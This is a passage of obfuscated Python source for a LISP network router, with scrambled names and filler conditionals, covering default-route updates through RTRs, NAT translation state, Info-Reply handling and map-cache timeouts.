if 53 - 53: iII111i
if 7 - 7: OoooooooOO . Ii1I - OoooooooOO / i1IIi / i1IIi / iIii1I11I1II1
return ( OOO0O0Oo0O0 )
if 78 - 78: i11iIiiIii / O0 . OoooooooOO % i11iIiiIii / iIii1I11I1II1 . OoooooooOO
if 1 - 1: oO0o - i11iIiiIii . OoOoOO00
if 16 - 16: OOooOOo
if 33 - 33: o0oOOo0O0Ooo / OoO0O00 + OoooooooOO
if 82 - 82: o0oOOo0O0Ooo / i1IIi / i11iIiiIii * Oo0Ooo / OoO0O00
if 95 - 95: I11i . OoOoOO00 * Ii1I
if 94 - 94: OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
def lisp_update_default_routes ( map_resolver , iid , rtr_list ) :
OoooO0oo0o0 = ( os . getenv ( "LISP_RTR_BEHIND_NAT" ) != None )
if 24 - 24: oO0o % Ii1I / i1IIi
oOOOI11I = { }
for OooOOoOO0OO in rtr_list :
if ( OooOOoOO0OO == None ) : continue
oOOOo0o = rtr_list [ OooOOoOO0OO ]
if ( OoooO0oo0o0 and oOOOo0o . is_private_address ( ) ) : continue
oOOOI11I [ OooOOoOO0OO ] = oOOOo0o
if 52 - 52: Ii1I * II111iiii - OOooOOo % o0oOOo0O0Ooo
rtr_list = oOOOI11I
if 78 - 78: OOooOOo + OoooooooOO - I1IiiI - Ii1I . II111iiii . O0
IIi1I1i11i11 = [ ]
for O0ooO0O00oo0 in [ LISP_AFI_IPV4 , LISP_AFI_IPV6 , LISP_AFI_MAC ] :
if ( O0ooO0O00oo0 == LISP_AFI_MAC and lisp_l2_overlay == False ) : break
if 52 - 52: oO0o
if 73 - 73: IiII - II111iiii - OOooOOo % II111iiii + iIii1I11I1II1
if 81 - 81: i11iIiiIii - O0 + I1IiiI
if 39 - 39: IiII * OOooOOo . OoooooooOO + Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
oO00Ooo0O0 = lisp_address ( O0ooO0O00oo0 , "" , 0 , iid )
oO00Ooo0O0 . make_default_route ( oO00Ooo0O0 )
I11 = lisp_map_cache . lookup_cache ( oO00Ooo0O0 , True )
if ( I11 ) :
if ( I11 . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( I11 . print_eid_tuple ( ) , False ) ) )
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
elif ( I11 . do_rloc_sets_match ( list ( rtr_list . values ( ) ) ) ) :
continue
if 10 - 10: O0 / I11i
I11 . delete_cache ( )
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
IIi1I1i11i11 . append ( [ oO00Ooo0O0 , "" ] )
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
o0o0o = lisp_address ( O0ooO0O00oo0 , "" , 0 , iid )
o0o0o . make_default_multicast_route ( o0o0o )
O0o0o0o0O = lisp_map_cache . lookup_cache ( o0o0o , True )
if ( O0o0o0o0O ) : O0o0o0o0O = O0o0o0o0O . source_cache . lookup_cache ( oO00Ooo0O0 , True )
if ( O0o0o0o0O ) : O0o0o0o0O . delete_cache ( )
if 16 - 16: iIii1I11I1II1 / OoO0O00 . IiII + IiII / I1ii11iIi11i
IIi1I1i11i11 . append ( [ oO00Ooo0O0 , o0o0o ] )
if 49 - 49: I11i + OOooOOo - I1ii11iIi11i
if ( len ( IIi1I1i11i11 ) == 0 ) : return
if 23 - 23: OOooOOo % I1ii11iIi11i + iIii1I11I1II1 + iII111i
if 9 - 9: OOooOOo * o0oOOo0O0Ooo / I11i . i11iIiiIii
if 44 - 44: iII111i - II111iiii
if 45 - 45: OoO0O00 % iII111i / iIii1I11I1II1 % I1IiiI + OOooOOo
IiIiIiiII1I = [ ]
for i1I1IIIi11I in rtr_list :
o0Ii1i1ii11 = rtr_list [ i1I1IIIi11I ]
iII = lisp_rloc ( )
iII . rloc . copy_address ( o0Ii1i1ii11 )
iII . priority = 254
iII . mpriority = 255
iII . rloc_name = "RTR"
IiIiIiiII1I . append ( iII )
if 33 - 33: iII111i / i1IIi . II111iiii % I1ii11iIi11i
if 74 - 74: iII111i / OOooOOo / O0 / iIii1I11I1II1 + IiII
for oO00Ooo0O0 in IIi1I1i11i11 :
I11 = lisp_mapping ( oO00Ooo0O0 [ 0 ] , oO00Ooo0O0 [ 1 ] , IiIiIiiII1I )
I11 . mapping_source = map_resolver
I11 . map_cache_ttl = LISP_MR_TTL * 60
I11 . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( I11 . print_eid_tuple ( ) , False ) , list ( rtr_list . keys ( ) ) ) )
if 26 - 26: OOooOOo % i1IIi . I1Ii111 / O0 + I1Ii111
IiIiIiiII1I = copy . deepcopy ( IiIiIiiII1I )
if 39 - 39: I1ii11iIi11i * I1IiiI * II111iiii . Oo0Ooo % I1IiiI
return
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
if 18 - 18: Ii1I
if 82 - 82: OoOoOO00 + OoO0O00 - IiII / ooOoO0o
if 70 - 70: OoO0O00
if 43 - 43: ooOoO0o + OOooOOo + II111iiii - I1IiiI
def lisp_process_info_reply ( source , packet , store ) :
if 58 - 58: I11i
if 94 - 94: Oo0Ooo
if 39 - 39: I11i - oO0o % iII111i - ooOoO0o - OoOoOO00
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
oOOOoO0o00 = lisp_info ( )
packet = oOOOoO0o00 . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
oOOOoO0o00 . print_info ( )
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
if 3 - 3: OoO0O00 + O0 % Oo0Ooo * Oo0Ooo % i11iIiiIii
I1i1Ooo = False
for i1I1IIIi11I in oOOOoO0o00 . rtr_list :
Oo0o = i1I1IIIi11I . print_address_no_iid ( )
if ( Oo0o in lisp_rtr_list ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ Oo0o ] != None ) : continue
if 97 - 97: I1Ii111 % iII111i
I1i1Ooo = True
lisp_rtr_list [ Oo0o ] = i1I1IIIi11I
if 32 - 32: Ii1I % iIii1I11I1II1 + i1IIi / o0oOOo0O0Ooo
if 6 - 6: OoOoOO00 % o0oOOo0O0Ooo - IiII . OOooOOo / i11iIiiIii * i1IIi
if 1 - 1: iII111i - OoOoOO00 + II111iiii + o0oOOo0O0Ooo % iIii1I11I1II1 - OOooOOo
if 60 - 60: ooOoO0o % iIii1I11I1II1 / iIii1I11I1II1
if 61 - 61: oO0o
if ( lisp_i_am_itr and I1i1Ooo ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for i1oO00O in list ( lisp_iid_to_interface . keys ( ) ) :
lisp_update_default_routes ( source , int ( i1oO00O ) , lisp_rtr_list )
if 12 - 12: iIii1I11I1II1 - I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 98 - 98: oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o - OoO0O00
if 12 - 12: IiII . OoooooooOO - iIii1I11I1II1 % iII111i
if 56 - 56: Oo0Ooo / I1IiiI + iIii1I11I1II1 + I1IiiI % iIii1I11I1II1
if 64 - 64: O0
if 55 - 55: OoO0O00 * oO0o . Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if ( store == False ) :
return ( [ oOOOoO0o00 . global_etr_rloc , oOOOoO0o00 . etr_port , I1i1Ooo ] )
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if 56 - 56: Oo0Ooo
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
for II1II1Iii1I in lisp_db_list :
for iII in II1II1Iii1I . rloc_set :
OooOOoOO0OO = iII . rloc
i1i1111I = iII . interface
if ( i1i1111I == None ) :
if ( OooOOoOO0OO . is_null ( ) ) : continue
if ( OooOOoOO0OO . is_local ( ) == False ) : continue
if ( oOOOoO0o00 . private_etr_rloc . is_null ( ) == False and
OooOOoOO0OO . is_exact_match ( oOOOoO0o00 . private_etr_rloc ) == False ) :
continue
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
elif ( oOOOoO0o00 . private_etr_rloc . is_dist_name ( ) ) :
oOo = oOOOoO0o00 . private_etr_rloc . address
if ( oOo != iII . rloc_name ) : continue
if 19 - 19: o0oOOo0O0Ooo % I11i . I1ii11iIi11i
if 70 - 70: Oo0Ooo - I11i / I1ii11iIi11i % OoO0O00 % II111iiii
iIiI1I1ii1I1 = green ( II1II1Iii1I . eid . print_prefix ( ) , False )
o00oO = red ( OooOOoOO0OO . print_address_no_iid ( ) , False )
if 72 - 72: i11iIiiIii * I11i
O0OOO0Oo0o00 = oOOOoO0o00 . global_etr_rloc . is_exact_match ( OooOOoOO0OO )
if ( iII . translated_port == 0 and O0OOO0Oo0o00 ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( o00oO ,
i1i1111I , iIiI1I1ii1I1 ) )
continue
if 37 - 37: I1IiiI % I1ii11iIi11i / OoooooooOO - OoO0O00 . I1ii11iIi11i
if 15 - 15: I11i / oO0o * ooOoO0o . o0oOOo0O0Ooo + I1ii11iIi11i
if 35 - 35: i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
O00III111i1I = oOOOoO0o00 . global_etr_rloc
IIIiIiOo0000o00 = iII . translated_rloc
if ( IIIiIiOo0000o00 . is_exact_match ( O00III111i1I ) and
oOOOoO0o00 . etr_port == iII . translated_port ) : continue
if 95 - 95: iII111i + OoooooooOO + O0 . OoOoOO00 + I1ii11iIi11i
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( oOOOoO0o00 . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# i1IIi - i1IIi / O0 % OoooooooOO * I1Ii111
oOOOoO0o00 . etr_port , o00oO , i1i1111I , iIiI1I1ii1I1 ) )
if 98 - 98: Ii1I % o0oOOo0O0Ooo . II111iiii
iII . store_translated_rloc ( oOOOoO0o00 . global_etr_rloc ,
oOOOoO0o00 . etr_port )
if 50 - 50: OoooooooOO . iII111i . I1ii11iIi11i / O0
if 97 - 97: o0oOOo0O0Ooo / I1IiiI - OoOoOO00
return ( [ oOOOoO0o00 . global_etr_rloc , oOOOoO0o00 . etr_port , I1i1Ooo ] )
if 98 - 98: OoooooooOO . ooOoO0o % iII111i + I1IiiI * Ii1I . oO0o
if 21 - 21: i11iIiiIii % OoO0O00 * iII111i * o0oOOo0O0Ooo % Oo0Ooo
if 7 - 7: oO0o * OoooooooOO % o0oOOo0O0Ooo . I1Ii111 + O0
if 14 - 14: I11i * II111iiii % o0oOOo0O0Ooo / iII111i . OoooooooOO % iII111i
if 88 - 88: iII111i
if 94 - 94: OoooooooOO
if 32 - 32: I1ii11iIi11i
if 8 - 8: I11i * i11iIiiIii - ooOoO0o
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
I11I = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
IIiIi11i11I = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 49 - 49: oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
I11I . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , I11I , None )
I11I . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , I11I , None )
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
if 36 - 36: o0oOOo0O0Ooo / OoO0O00
IIiIi11i11I . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , IIiIi11i11I , None )
IIiIi11i11I . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , IIiIi11i11I , None )
if 6 - 6: I11i % I1IiiI + iII111i * OoooooooOO . O0
if 87 - 87: ooOoO0o / Ii1I % O0 . OoO0O00
if 55 - 55: i1IIi . o0oOOo0O0Ooo % OoooooooOO + II111iiii . OoOoOO00
if 32 - 32: IiII * I1Ii111 * Oo0Ooo . i1IIi * OoooooooOO
iiO0ooOO = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
iiO0ooOO . start ( )
return
if 63 - 63: OoooooooOO - ooOoO0o % oO0o / i11iIiiIii % i11iIiiIii
if 30 - 30: Oo0Ooo . IiII . OoooooooOO
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
if 79 - 79: I11i - II111iiii
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
if 10 - 10: i1IIi + o0oOOo0O0Ooo
if 47 - 47: OOooOOo * IiII % I1Ii111 . OoOoOO00 - OoooooooOO / OoooooooOO
if 79 - 79: I11i % i11iIiiIii % I1IiiI . OoooooooOO * oO0o . Ii1I
if 14 - 14: iIii1I11I1II1 / I11i - o0oOOo0O0Ooo / IiII / o0oOOo0O0Ooo . OoO0O00
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 2 - 2: I11i
oOOOo0o = lisp_get_interface_address ( rloc . interface )
if ( oOOOo0o == None ) : return
if 12 - 12: i1IIi . I1Ii111
oOo0o0oo00O0Ooo = rloc . rloc . print_address_no_iid ( )
iiiiIIiiII1Iii1 = oOOOo0o . print_address_no_iid ( )
if 85 - 85: i1IIi . O0 . Oo0Ooo
if ( oOo0o0oo00O0Ooo == iiiiIIiiII1Iii1 ) : return
if 8 - 8: i11iIiiIii
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , oOo0o0oo00O0Ooo , iiiiIIiiII1Iii1 ) )
if 80 - 80: I1ii11iIi11i + Ii1I
if 16 - 16: i11iIiiIii * Oo0Ooo
rloc . rloc . copy_address ( oOOOo0o )
lisp_myrlocs [ 0 ] = oOOOo0o
return
if 76 - 76: iII111i . oO0o - i1IIi
if 94 - 94: O0 % iII111i
if 90 - 90: IiII
if 1 - 1: I1ii11iIi11i % OoOoOO00 . I1ii11iIi11i . OoooooooOO % oO0o + Ii1I
if 46 - 46: I1IiiI + OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if 90 - 90: oO0o * I1Ii111 / O0
def lisp_update_encap_port ( mc ) :
for OooOOoOO0OO in mc . rloc_set :
i1II11 = lisp_get_nat_info ( OooOOoOO0OO . rloc , OooOOoOO0OO . rloc_name )
if ( i1II11 == None ) : continue
if ( OooOOoOO0OO . translated_port == i1II11 . port ) : continue
if 15 - 15: o0oOOo0O0Ooo * O0 . OOooOOo / Oo0Ooo
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( OooOOoOO0OO . translated_port , i1II11 . port ,
# OoO0O00 / OoooooooOO
red ( OooOOoOO0OO . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 17 - 17: iIii1I11I1II1 % I11i
OooOOoOO0OO . store_translated_rloc ( OooOOoOO0OO . rloc , i1II11 . port )
if 31 - 31: OoooooooOO - OoO0O00 . iIii1I11I1II1 % I1IiiI
return
if 98 - 98: I1IiiI + Ii1I
if 7 - 7: o0oOOo0O0Ooo . OoooooooOO
if 32 - 32: I1ii11iIi11i
if 46 - 46: Ii1I . i11iIiiIii / I1Ii111 - I1ii11iIi11i
if 13 - 13: IiII % I1Ii111
if 9 - 9: OoooooooOO * ooOoO0o % I1ii11iIi11i . I1IiiI % O0
if 91 - 91: OOooOOo * OoooooooOO * I1IiiI . i1IIi
if 9 - 9: oO0o / i11iIiiIii + IiII / IiII - I11i
if 87 - 87: iII111i
if 37 - 37: oO0o + OoO0O00
if 66 - 66: iIii1I11I1II1 * iIii1I11I1II1 + IiII % I1IiiI
if 60 - 60: I1Ii111 . IiII / Oo0Ooo
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 32 - 32: OoOoOO00 + Ii1I * iII111i % Oo0Ooo
if 61 - 61: OoooooooOO % iII111i - O0
O000oo = lisp_get_timestamp ( )
if 62 - 62: iIii1I11I1II1
if 14 - 14: I1Ii111
if 95 - 95: II111iiii / o0oOOo0O0Ooo * OOooOOo
if 81 - 81: i11iIiiIii / iIii1I11I1II1
if 73 - 73: i11iIiiIii . I1ii11iIi11i * OoOoOO00
if 95 - 95: i1IIi + iIii1I11I1II1 . I1Ii111 / I1Ii111
if ( mc . last_refresh_time + mc . map_cache_ttl > O000oo ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 84 - 84: Oo0Ooo . OoO0O00 * IiII
if 95 - 95: OoO0O00
if 100 - 100: II111iiii
if 34 - 34: I11i % OOooOOo - iII111i % II111iiii
if 14 - 14: I11i * o0oOOo0O0Ooo % II111iiii
if ( lisp_nat_traversal and mc . eid . address == 0 and mc . eid . mask_len == 0 ) :
return ( [ True , delete_list ] )
if 36 - 36: ooOoO0o - iIii1I11I1II1 / IiII + OoOoOO00
if 42 - 42: ooOoO0o + I1IiiI * iII111i / OoOoOO00 . i1IIi - OoooooooOO
if 8 - 8: iIii1I11I1II1 - Oo0Ooo + iII111i
if 40 - 40: o0oOOo0O0Ooo * I1IiiI
if 75 - 75: O0 * OOooOOo / ooOoO0o + I11i
Ii1i1 = lisp_print_elapsed ( mc . last_refresh_time )
OoO0oO = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( OoO0oO , False ) , bold ( "timed out" , False ) , Ii1i1 ) )
if 56 - 56: I1IiiI % OoooooooOO % Oo0Ooo
if 19 - 19: i11iIiiIii - iIii1I11I1II1 . i1IIi . I1Ii111 / I1IiiI * I1Ii111
if 41 - 41: oO0o . o0oOOo0O0Ooo . I11i * OoOoOO00
if 16 - 16: oO0o
if 32 - 32: OoooooooOO
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 77 - 77: Oo0Ooo . i1IIi - I11i
if 98 - 98: O0
if 87 - 87: OoO0O00 % I1Ii111 - OOooOOo - II111iiii + iII111i
if 54 - 54: i1IIi % iII111i
if 16 - 16: II111iiii - Oo0Ooo
if 44 - 44: OOooOOo / Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if 85 - 85: iIii1I11I1II1 / Ii1I
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
def lisp_timeout_map_cache_walk ( mc , parms ) :
iIi1II1IiI1I = parms [ 0 ]
o0Oo0O = parms [ 1 ]
if 10 - 10: I11i - iII111i / I1ii11iIi11i * i11iIiiIii % II111iiii % OoOoOO00
if 98 - 98: OoooooooOO * IiII . OoOoOO00
if 46 - 46: ooOoO0o / OOooOOo * I1Ii111 % OoOoOO00 . ooOoO0o - i1IIi
if 11 - 11: OoOoOO00 - II111iiii + I1Ii111 + IiII + OOooOOo - ooOoO0o
if ( mc . group . is_null ( ) ) :
o0o0O0O0Oooo0 , iIi1II1IiI1I = lisp_timeout_map_cache_entry ( mc , iIi1II1IiI1I )
if ( iIi1II1IiI1I == [ ] or mc != iIi1II1IiI1I [ - 1 ] ) :
o0Oo0O = lisp_write_checkpoint_entry ( o0Oo0O , mc )
if 12 - 12: Ii1I - oO0o % I1ii11iIi11i / oO0o
return ( [ o0o0O0O0Oooo0 , parms ] )
if 14 - 14: OOooOOo * iII111i . IiII + i1IIi % i1IIi
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if 59 - 59: ooOoO0o . iII111i - II111iiii
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 30 - 30: o0oOOo0O0Ooo % iII111i - i11iIiiIii
if 25 - 25: i11iIiiIii + OoOoOO00 + oO0o / Ii1I * Oo0Ooo + Oo0Ooo
if 26 - 26: I1IiiI % I1ii11iIi11i + o0oOOo0O0Ooo / I1ii11iIi11i - I1IiiI
if 55 - 55: OoooooooOO
if 2 - 2: Oo0Ooo + I11i / OOooOOo + OOooOOo
if 62 - 62: OOooOOo . iIii1I11I1II1 + I1IiiI / OOooOOo
if 90 - 90: OOooOOo
def lisp_timeout_map_cache ( lisp_map_cache ) :
I1iI1i11IiI11 = [ [ ] , [ ] ]
I1iI1i11IiI11 = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , I1iI1i11IiI11 )
if 29 - 29: OoOoOO00 - I1IiiI / oO0o + Oo0Ooo + I1Ii111 + O0
if 65 - 65: oO0o
if 38 - 38: iIii1I11I1II1 / I1Ii111 + ooOoO0o . II111iiii - iIii1I11I1II1
if 13 - 13: Ii1I
if 34 - 34: I1IiiI / iIii1I11I1II1
iIi1II1IiI1I = I1iI1i11IiI11 [ 0 ]
for I11 in iIi1II1IiI1I : I11 . delete_cache ( )
if 35 - 35: oO0o / oO0o
if 86 - 86: o0oOOo0O0Ooo . Oo0Ooo - Ii1I / i11iIiiIii
if 63 - 63: oO0o - O0 + I1ii11iIi11i + Ii1I / i1IIi
if 77 - 77: O0
o0Oo0O = I1iI1i11IiI11 [ 1 ]
lisp_checkpoint ( o0Oo0O )
return
if 49 - 49: o0oOOo0O0Ooo / i11iIiiIii
if 36 - 36: II111iiii
if 78 - 78: OoO0O00 + iIii1I11I1II1 * i1IIi
if 7 - 7: i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
if 74 - 74: I11i . I11i
if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
def lisp_store_nat_info ( hostname , rloc , port ) :
Oo0o = rloc . print_address_no_iid ( )
Ooo0OO0 = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( Oo0o , False ) , port )
if 19 - 19: i1IIi
i1i1i = lisp_nat_info ( Oo0o , hostname , port )
if 42 - 42: o0oOOo0O0Ooo / ooOoO0o * i1IIi % O0
if ( hostname not in lisp_nat_state_info ) :
lisp_nat_state_info [ hostname ] = [ i1i1i ]
lprint ( Ooo0OO0 . format ( "Store initial" ) )
return ( True )
if 53 - 53: ooOoO0o * I1ii11iIi11i
if 22 - 22: Ii1I % I11i
if 61 - 61: i11iIiiIii % OoOoOO00 / OoooooooOO
if 92 - 92: IiII * IiII * i11iIiiIii / iII111i % iII111i + I11i
if 3 - 3: Ii1I % iIii1I11I1II1 - I1Ii111 . oO0o . iII111i / o0oOOo0O0Ooo
if 8 - 8: O0 - I1Ii111
i1II11 = lisp_nat_state_info [ hostname ] [ 0 ]
if ( i1II11 . address == Oo0o and i1II11 . port == port ) :
i1II11 . uptime = lisp_get_timestamp ( )
lprint ( Ooo0OO0 . format ( "Refresh existing" ) )
return ( False )
if 82 - 82: iII111i + II111iiii
if 29 - 29: O0 % Ii1I * ooOoO0o % O0
if 83 - 83: oO0o
if 95 - 95: Oo0Ooo * O0 % i1IIi / iII111i + oO0o
if 85 - 85: iIii1I11I1II1 / I11i
if 65 - 65: I11i / i1IIi * OoOoOO00 * Ii1I * OoO0O00
if 74 - 74: I1ii11iIi11i . I1ii11iIi11i % IiII + OOooOOo . OoO0O00 * I11i
I11ii1i1i1 = None
for i1II11 in lisp_nat_state_info [ hostname ] :
if ( i1II11 . address == Oo0o and i1II11 . port == port ) :
I11ii1i1i1 = i1II11
break
if 83 - 83: I11i . I11i * OOooOOo - OOooOOo
if 46 - 46: iIii1I11I1II1 . I1Ii111 % I1IiiI
if 22 - 22: i1IIi * I11i + II111iiii + II111iiii
if ( I11ii1i1i1 == None ) :
lprint ( Ooo0OO0 . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( I11ii1i1i1 )
lprint ( Ooo0OO0 . format ( "Use previous" ) )
if 20 - 20: I11i
if 37 - 37: I1Ii111
IIi1i1IIi1 = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ i1i1i ] + IIi1i1IIi1
return ( True )
if 87 - 87: OoO0O00
if 32 - 32: I11i
if 78 - 78: ooOoO0o * iII111i
if 31 - 31: I1IiiI + OOooOOo . OoooooooOO
if 24 - 24: ooOoO0o
if 53 - 53: I1ii11iIi11i % OOooOOo
if 92 - 92: I1IiiI / ooOoO0o
if 5 - 5: OoooooooOO - oO0o
def lisp_get_nat_info ( rloc , hostname ) :
if ( hostname not in lisp_nat_state_info ) : return ( None )
if 52 - 52: I11i . OOooOOo * ooOoO0o / i11iIiiIii . OoO0O00 * ooOoO0o
Oo0o = rloc . print_address_no_iid ( )
for i1II11 in lisp_nat_state_info [ hostname ] :
if ( i1II11 . address == Oo0o ) : return ( i1II11 )
if 58 - 58: i1IIi - OoO0O00 * II111iiii
return ( None )
if 92 - 92: ooOoO0o / I1Ii111 . iII111i
if 59 - 59: Ii1I - OoO0O00 % iII111i + I1ii11iIi11i * iII111i
if 51 - 51: ooOoO0o - Oo0Ooo / iII111i . I11i - Ii1I / OOooOOo
if 4 - 4: II111iiii + OoOoOO00 . ooOoO0o - I11i . I1IiiI
if 46 - 46: II111iiii
if 38 - 38: OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if 89 - 89: I1Ii111
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
if 73 - 73: OoooooooOO
if 25 - 25: i1IIi . II111iiii . I1Ii111
if 81 - 81: II111iiii + OoOoOO00 * II111iiii / iIii1I11I1II1 - Oo0Ooo % oO0o
if 66 - 66: ooOoO0o % O0 + iIii1I11I1II1 * I1Ii111 - I1Ii111
if 61 - 61: I1ii11iIi11i
if 12 - 12: OoO0O00
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 97 - 97: OOooOOo . Oo0Ooo . oO0o * i1IIi
if 7 - 7: Oo0Ooo
if 38 - 38: Oo0Ooo - I1ii11iIi11i
if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if 3 - 3: Ii1I
OoI1i1 = [ ]
oO0O = [ ]
if ( dest == None ) :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
oO0O . append ( iii1i . map_resolver )
if 80 - 80: IiII % O0 * Oo0Ooo
OoI1i1 = oO0O
if ( OoI1i1 == [ ] ) :
